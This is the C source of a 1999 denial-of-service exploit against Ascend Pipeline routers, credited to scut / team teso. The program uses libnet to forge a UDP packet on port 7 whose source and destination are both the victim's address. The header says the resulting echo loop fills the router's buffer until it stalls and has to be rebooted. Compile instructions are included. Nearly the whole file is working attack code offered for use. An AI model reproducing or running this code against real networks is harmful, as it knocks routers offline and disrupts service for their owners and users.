/* ascend foo denial of service exploit * 1999/09/25 * * basically just another lame echo/echo link, but has nice results on ascend, * you can increase the lag in steps of 2ms by sending one packet, after some * few hundret ms lag you overflow the internal packet buffer and the whole * connection stalls, the router has to be rebooted. * * by scut / team teso [http://teso.scene.at/] * * compile with: gcc -o ascend-foo ascend-foo.c -Wall -lnet -DLIBNET_LIL_ENDIAN * works fine against Ascend Pipeline * modells, haven't tried against others */ #include <stdio.h> #include <libnet.h> int main (int argc, char **argv) { int sock, c; u_long src_ip; u_char *buf; u_char *qbuf; int qbuf_s = 0; printf ("ascend-foo, udp echo dos attack\nby scut / team teso\n\n"); if (argc < 2) { printf ("usage: %s <srcip> [packetsize]\n\n", argv[0]); exit (EXIT_FAILURE); } else if (argc == 2) { qbuf_s = 73; } else { qbuf_s = atoi (argv[2]); } qbuf = malloc (qbuf_s); src_ip = libnet_name_resolve (argv[1], 0); if (src_ip == 0) { printf ("invalid syntax\n"); exit (EXIT_FAILURE); } buf = calloc (1, (UDP_H + IP_H + qbuf_s)); if (buf == NULL) { perror ("No memory for packet"); exit (EXIT_FAILURE); } libnet_seed_prand (); sock = libnet_open_raw_sock(IPPROTO_RAW); if (sock == -1) { perror ("No socket"); exit (EXIT_FAILURE); } libnet_build_ip ( UDP_H + qbuf_s, /* content size */ 0, /* tos */ 0, /* id */ 0, /* frag */ 64, /* ttl */ IPPROTO_UDP, /* subprotocol */ src_ip, /* heh ;) */ src_ip, NULL, /* payload already there */ 0, /* same */ buf); /* build in packet buffer */ libnet_build_udp ( 7, /* source port */ 7, qbuf, /* content already there */ qbuf_s, /* same */ buf + IP_H); /* build after ip header */ libnet_do_checksum (buf, IPPROTO_UDP, UDP_H + qbuf_s); c = libnet_write_ip (sock, buf, UDP_H + IP_H + qbuf_s); if (c < UDP_H + IP_H + qbuf_s) { printf ("write_ip wrote too less bytes\n"); } printf ("completed, wrote %d bytes to victim router\n", c); free (buf); return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS); }